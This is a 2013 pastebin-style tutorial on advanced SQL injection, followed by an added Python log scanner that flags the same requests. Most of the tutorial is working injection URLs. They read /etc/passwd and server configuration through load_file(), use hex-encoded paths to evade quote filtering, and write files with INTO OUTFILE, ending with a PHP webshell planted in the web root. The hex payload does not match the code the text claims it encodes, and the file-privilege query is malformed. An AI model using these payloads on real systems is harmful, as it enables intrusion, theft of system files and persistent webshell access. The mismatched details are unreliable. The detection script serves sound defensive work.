striker123

SQL injection advance

Apr 6th, 2013
First of all, hello to all readers whoever is reading this article. Once again I am going to tell you about advanced SQL Injection. As this is my second article on SQL Injection, I am not going to cover the basic SQLi stuff, and I assume that you have already read my previous article about URL Based SQL Injection. If you haven't read it, please go to the following link:

http://pastebin.com/ywGhfNCn

This time I am going to tell you about reading (Local File Inclusion) and writing (PHP Code Writing) files through SQL Injection. First of all, in order to read or write files on the database server (usually the web server as well, because in 90% of cases the database and the web server are the same computer), we must have file privileges.

Let us assume the example from the previous article, having the following URL:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,3,4

Now assuming the vulnerable column is 3, we can check the current user by injecting @@user or user() in place of 3:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,user(),4

If the user is root@localhost, then the chances of having file privileges are higher. If your target doesn't have 'root' as the user, don't lose heart, we still might have file privileges. To check the file privileges we can execute the following query:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,file_priv,4 where username=user();

If we get a 'Y' then we have file privileges and we can read or write files. But if it doesn't reply 'Y' we can still try by reading a file from the server. The file which we should read is '/etc/passwd', as it is usually readable by all users on Linux/Unix platforms. To read files from the server we will use the function load_file():

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,load_file('/etc/passwd'),4

Sometimes the apostrophe (') is blocked in the URL, so we can encode our file location as a hexadecimal literal like below:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,load_file(0x2f6574632f706173737764),4

NOTE: Don't forget to put '0x' before the hexadecimal code.

If we are able to read the passwd file, then we may try other configuration files for further exploitation, like httpd.conf.

In order to write files on the server we must note that if the apostrophe is blocked in the URL then we cannot write a file on the server, as it requires the use of the apostrophe. Now that we know the apostrophe is required, let us assume that it is not blocked so we can write the file. To write a file on the server we will be using INTO OUTFILE as below:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,'Striker is here',4 INTO OUTFILE '/tmp/pentest.txt'--

It is good practice to write files in the /tmp directory, as all users have write privileges in /tmp. We can read the file back from /tmp to confirm:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,load_file('/tmp/pentest.txt'),4

After confirming the file which we've written, we can write a webshell on the target website after encoding the shell code into hexadecimal. Assuming that the web directory is /var/www/html/ (which we can confirm after reading httpd.conf) and the code which we want to write into test.php is <?php echo "Hello striker is here" ?>, the URL will be:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,unhex(3c3f706870206563686f2020221c4b7972696f6e204861636b696e67205475746f7269616c7322201d203f3e),4 INTO OUTFILE '/var/www/html/test.php'--

As you might have noticed, the code which we are going to write must be encoded in hexadecimal, else it will not work. Now we can execute the code by just going to the URL:

http://www.site.com/test.php

This is how you can read and write files on a server using SQL Injection. Using the above method one can write malicious code, e.g. webshells, on a website using a SQL Injection vulnerability. I hope some of you will find this useful.
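From the defender's side, every request shown in this article leaves a recognisable trail in the web server's access log. The following Python script is an added example (not part of the original paste): it URL-decodes each logged request, flags the load_file(), INTO OUTFILE/DUMPFILE and UNION SELECT patterns used above, and decodes 0x hex literals so the hidden path (here /etc/passwd) is visible to the analyst. The log lines are constructed, and the signatures are my own assumptions about useful indicators, not a vendor rule set.

```python
# Added example: flag this article's load_file() / INTO OUTFILE requests in an
# Apache-style access log. Sample lines are constructed; signatures are assumptions.
import re
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
10.0.0.5 - - [06/Apr/2013:10:01:02 +0000] "GET /news.php?id=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Apr/2013:10:01:07 +0000] "GET /news.php?id=-4%20UNION%20ALL%20SELECT%201,2,load_file(0x2f6574632f706173737764),4 HTTP/1.1" 200 2048 "-" "curl/7.29"
10.0.0.9 - - [06/Apr/2013:10:01:15 +0000] "GET /news.php?id=-4%20UNION%20ALL%20SELECT%201,2,3,4%20INTO%20OUTFILE%20'/tmp/pentest.txt'-- HTTP/1.1" 200 2048 "-" "curl/7.29"
10.0.0.7 - - [06/Apr/2013:10:02:00 +0000] "GET /docs/load_file_format.pdf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
SIGNATURES = {  # matched against the decoded, lower-cased request URL
    "file_read": re.compile(r"\bload_file\s*\("),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b"),
    "union": re.compile(r"\bunion\b.*\bselect\b"),
}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b")

def normalise(url):
    """URL-decode repeatedly (catches double encoding), collapse whitespace, lower-case."""
    for _ in range(3):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return re.sub(r"\s+", " ", url).lower()

def decode_hex_literals(text):
    """Return the printable ASCII strings hidden in 0x... literals, e.g. '/etc/passwd'."""
    found = []
    for match in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(match.group(1))
        if all(32 <= b < 127 for b in raw):
            found.append(raw.decode("ascii"))
    return found

def scan_log(log_text):
    """Return (client_ip, matched_signatures, decoded_hex) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = normalise(match.group(1))
        tags = sorted(name for name, rx in SIGNATURES.items() if rx.search(url))
        if tags:
            hits.append((line.split()[0], tags, decode_hex_literals(url)))
    return hits
```

The benign /docs/load_file_format.pdf line is deliberately included: requiring the opening parenthesis after load_file keeps it from being flagged.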

Disclaimer: Please do not use this information to harm anyone; this article is for educational purposes only.

Like my Page
https://www.facebook.com/Str1.k3r.gov